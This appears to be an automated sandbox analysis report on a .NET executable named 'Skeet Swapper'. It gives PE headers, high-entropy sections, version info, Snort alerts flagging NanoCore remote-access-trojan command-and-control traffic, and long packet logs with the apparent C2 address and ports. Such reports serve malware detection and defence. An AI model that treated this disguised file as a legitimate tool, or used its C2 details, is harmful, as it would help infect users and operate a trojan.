                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1ca5000x4b.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1cc0000x33fe8.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2000000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x1c85540x1c8600False0.999514259792data7.99980395725IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x1cc0000x33fe80x34000False0.535376915565data6.00356457348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x2000000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0x1cc4b80x33928dBase IV DBT of \220\001.DBF, blocks size 0, block length 8192, next free block index 40, next free block 4280639354, next used block 4280835192
                                                  RT_GROUP_ICON0x1ffde00x14data
                                                  RT_VERSION0x1cc1300x384data
                                                  RT_MANIFEST0x1ffdf80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyrightSkeet Swapper
                                                  Assembly Version1.2.3.4
                                                  InternalNameSkeet Swapper1.exe
                                                  FileVersion1.2.3.4
                                                  CompanyNameSkeet Swapper
                                                  LegalTrademarksSkeet Swapper
                                                  CommentsSkeet Swapper
                                                  ProductNameSkeet Swapper
                                                  ProductVersion1.2.3.4
                                                  FileDescriptionSkeet Swapper
                                                  OriginalFilenameSkeet Swapper1.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  01/26/22-02:40:16.178063TCP2025019ET TROJAN Possible NanoCore C2 60B4975153811192.168.2.354.38.136.57
                                                  01/26/22-02:40:20.931845TCP2025019ET TROJAN Possible NanoCore C2 60B4975553811192.168.2.354.38.136.57
                                                  01/26/22-02:40:25.414443TCP2025019ET TROJAN Possible NanoCore C2 60B4975753811192.168.2.354.38.136.57
                                                  01/26/22-02:40:45.303270TCP2025019ET TROJAN Possible NanoCore C2 60B4978353811192.168.2.354.38.136.57
                                                  01/26/22-02:40:49.565803TCP2025019ET TROJAN Possible NanoCore C2 60B4978553811192.168.2.354.38.136.57
                                                  01/26/22-02:40:53.833969TCP2025019ET TROJAN Possible NanoCore C2 60B4978653811192.168.2.354.38.136.57
                                                  01/26/22-02:41:13.666122TCP2025019ET TROJAN Possible NanoCore C2 60B4980453811192.168.2.354.38.136.57
                                                  01/26/22-02:41:17.949071TCP2025019ET TROJAN Possible NanoCore C2 60B4981253811192.168.2.354.38.136.57
                                                  01/26/22-02:41:22.425720TCP2025019ET TROJAN Possible NanoCore C2 60B4982953811192.168.2.354.38.136.57
                                                  01/26/22-02:41:42.814547TCP2025019ET TROJAN Possible NanoCore C2 60B4984853811192.168.2.354.38.136.57
                                                  01/26/22-02:41:47.074662TCP2025019ET TROJAN Possible NanoCore C2 60B4985353811192.168.2.354.38.136.57
                                                  01/26/22-02:41:51.190384TCP2025019ET TROJAN Possible NanoCore C2 60B4985553811192.168.2.354.38.136.57

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 26, 2022 02:40:06.382941961 CET4974948129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:06.422976017 CET481294974954.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:06.423192978 CET4974948129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:06.475699902 CET481294974954.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:06.475821972 CET4974948129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:06.674309015 CET4974948129192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:06.713202000 CET481294974954.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:15.267210960 CET4975153811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:15.304814100 CET538114975154.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:15.304970026 CET4975153811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:15.459533930 CET538114975154.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:15.459620953 CET4975153811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:16.178062916 CET4975153811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:16.179632902 CET4975153811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:16.215821028 CET538114975154.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:17.976990938 CET497528808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:18.016222954 CET88084975254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:18.624900103 CET497528808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:18.663444042 CET88084975254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:19.327810049 CET497528808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:19.366137028 CET88084975254.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:20.867247105 CET4975553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:20.904031038 CET538114975554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:20.904757977 CET4975553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:20.931844950 CET4975553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:20.955421925 CET538114975554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:20.957093954 CET4975553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:20.957670927 CET4975553811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:20.993757963 CET538114975554.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:25.376806974 CET4975753811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:25.413328886 CET538114975754.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:25.413567066 CET4975753811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:25.414443016 CET4975753811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:25.450689077 CET538114975754.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:25.450952053 CET4975753811192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:25.464041948 CET538114975754.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:25.487231016 CET538114975754.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:31.265311003 CET497608808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:31.303777933 CET88084976054.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:31.811641932 CET497608808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:31.849983931 CET88084976054.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:32.450469971 CET497608808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:32.489135027 CET88084976054.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:37.630414009 CET497638808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:37.669182062 CET88084976354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:38.314218044 CET497638808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:38.352937937 CET88084976354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:38.923297882 CET497638808192.168.2.354.38.136.57
                                                  Jan 26, 2022 02:40:38.962126017 CET88084976354.38.136.57192.168.2.3
                                                  Jan 26, 2022 02:40:40.723352909 CET49765443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:40.723397017 CET44349765142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:40.723404884 CET49766443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:40.723468065 CET44349766142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:40.723547935 CET49765443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:40.724471092 CET49766443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.081263065 CET49765443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.081298113 CET44349765142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:41.081397057 CET49766443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.081435919 CET44349766142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:41.135405064 CET44349765142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:41.135466099 CET44349766142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:41.135528088 CET49765443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.135582924 CET49766443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.136308908 CET44349766142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:41.136394978 CET49766443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.136778116 CET44349765142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:41.136868000 CET49765443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.578936100 CET4976880192.168.2.369.42.215.252
                                                  Jan 26, 2022 02:40:41.768156052 CET804976869.42.215.252192.168.2.3
                                                  Jan 26, 2022 02:40:41.768279076 CET4976880192.168.2.369.42.215.252
                                                  Jan 26, 2022 02:40:41.833442926 CET4976880192.168.2.369.42.215.252
                                                  Jan 26, 2022 02:40:41.896397114 CET49765443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.896425009 CET44349765142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:41.896862030 CET44349765142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:41.896934986 CET49765443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.900217056 CET49765443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.901747942 CET49766443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.901777983 CET44349766142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:41.902169943 CET44349766142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:41.902299881 CET49766443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.902975082 CET49766443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:41.941867113 CET44349765142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:41.945875883 CET44349766142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.046803951 CET804976869.42.215.252192.168.2.3
                                                  Jan 26, 2022 02:40:42.046902895 CET4976880192.168.2.369.42.215.252
                                                  Jan 26, 2022 02:40:42.090948105 CET44349765142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.091114998 CET44349765142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.091198921 CET49765443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.107141018 CET44349766142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.107242107 CET44349766142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.107389927 CET49766443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.232817888 CET49766443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.232846975 CET49765443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.232851982 CET44349766142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.232863903 CET44349765142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.234947920 CET49770443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.234982014 CET44349770142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.235112906 CET49771443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.235145092 CET49770443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.235157967 CET44349771142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.235620022 CET49770443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.235631943 CET44349770142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.235647917 CET49771443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.236454010 CET49771443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.236466885 CET44349771142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.318428993 CET44349770142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.318428040 CET44349771142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.318510056 CET49771443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.318537951 CET49770443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.320663929 CET49771443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.320676088 CET44349771142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.325081110 CET49771443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.325093985 CET44349771142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.325542927 CET49770443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.325555086 CET44349770142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.330351114 CET49770443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.330358982 CET44349770142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.526879072 CET44349770142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.526952982 CET49770443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.526967049 CET44349770142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.527002096 CET44349770142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.527018070 CET49770443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.527045012 CET49770443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.528013945 CET49770443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.528038025 CET44349770142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.539189100 CET44349771142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.539303064 CET44349771142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.539324045 CET49771443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.539360046 CET49771443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.554353952 CET49771443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.554379940 CET44349771142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.555773020 CET49772443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.555826902 CET44349772142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.556169987 CET49772443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.556868076 CET49773443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.556924105 CET44349773142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.557025909 CET49773443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.557898998 CET49772443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.557924032 CET44349772142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.558496952 CET49773443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.558520079 CET44349773142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.606714010 CET44349773142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.606933117 CET49773443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.609262943 CET44349772142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.609435081 CET49772443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.610310078 CET49773443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.610330105 CET44349773142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.615222931 CET49773443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.615247011 CET44349773142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.617470026 CET49772443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.617482901 CET44349772142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.621450901 CET49772443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.621465921 CET44349772142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.808711052 CET44349773142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.808825970 CET44349773142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.808835030 CET44349772142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.808902979 CET49773443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.808923006 CET49773443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.809000015 CET44349772142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.809017897 CET49772443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.809267998 CET49772443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.818929911 CET49773443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.818972111 CET44349773142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.820359945 CET49774443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.820399046 CET44349774142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.820897102 CET49774443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.820916891 CET49774443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.820921898 CET44349774142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.822276115 CET49772443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.822294950 CET44349772142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.823591948 CET49775443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.823632956 CET44349775142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.823723078 CET49775443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.825406075 CET49775443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.825443983 CET44349775142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.869520903 CET44349774142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.869803905 CET49774443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.871577978 CET49774443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.871584892 CET44349774142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.872040033 CET44349775142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.872159958 CET49775443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.875983953 CET49774443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.875989914 CET44349774142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.878705978 CET49775443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.878726959 CET44349775142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:42.886168003 CET49775443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:42.886183977 CET44349775142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.075062990 CET44349774142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.075215101 CET44349774142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.075278997 CET49774443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.075463057 CET49774443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.080125093 CET49774443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.080156088 CET44349774142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.081383944 CET49776443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.081437111 CET44349776142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.084027052 CET49776443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.084311962 CET44349775142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.084455013 CET44349775142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.084525108 CET49775443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.084661007 CET49775443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.085376978 CET49776443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.085396051 CET44349776142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.089505911 CET49775443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.089531898 CET44349775142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.090945959 CET49777443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.091006041 CET44349777142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.091164112 CET49777443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.091852903 CET49777443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.091864109 CET44349777142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.133397102 CET44349776142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.134305954 CET49776443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.139628887 CET44349777142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.139765024 CET49777443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.145829916 CET49776443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.145842075 CET44349776142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.145870924 CET49777443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.145885944 CET44349777142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.154556990 CET49777443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.154577971 CET44349777142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.154675007 CET49776443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.154685974 CET44349776142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.348932028 CET44349776142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.349109888 CET44349776142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.350287914 CET49776443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.354142904 CET49776443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.354173899 CET44349776142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.364939928 CET44349777142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.365044117 CET44349777142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.365051985 CET49777443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.365166903 CET49777443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.370109081 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.370194912 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.370342970 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.370606899 CET49777443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.370630026 CET44349777142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.370991945 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.371032000 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.372658968 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.372692108 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.374839067 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.375968933 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.375994921 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.420484066 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.421040058 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.421334028 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.421437979 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.421456099 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.421566010 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.423446894 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.423466921 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.426187992 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.426202059 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.427787066 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.427800894 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.624311924 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.624422073 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.624464989 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.624627113 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.628077030 CET49779443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.628099918 CET44349779142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.629750967 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.629806042 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.630062103 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.632761955 CET49780443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.632796049 CET44349780142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.636605978 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.636810064 CET44349778142.250.186.46192.168.2.3
                                                  Jan 26, 2022 02:40:43.636862993 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.638495922 CET49778443192.168.2.3142.250.186.46
                                                  Jan 26, 2022 02:40:43.638539076 CET49778443192.168.2.3142.250.186.46
